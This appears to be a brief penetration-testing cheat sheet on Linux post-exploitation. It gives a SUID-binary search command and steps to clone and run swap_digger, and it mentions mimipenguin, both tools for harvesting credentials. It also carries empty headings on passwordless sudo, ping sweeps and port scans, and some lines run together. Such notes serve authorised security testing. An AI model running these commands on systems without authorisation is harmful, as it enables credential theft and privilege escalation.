Linux Post Exploitation
Post Exploitation on Linux
Common Tools
SUID
find / -perm -u=s -type f 2>/dev/nullswap_digger
git clone https://github.com/sevagas/swap_digger.git
cd swap_digger
chmod +x swap_digger.sh
sudo ./swap_digger.sh -vxmimipenguin
Add User as Passwordless Sudo
Ping Sweep with Bash
Port Scan with Bash
Last updated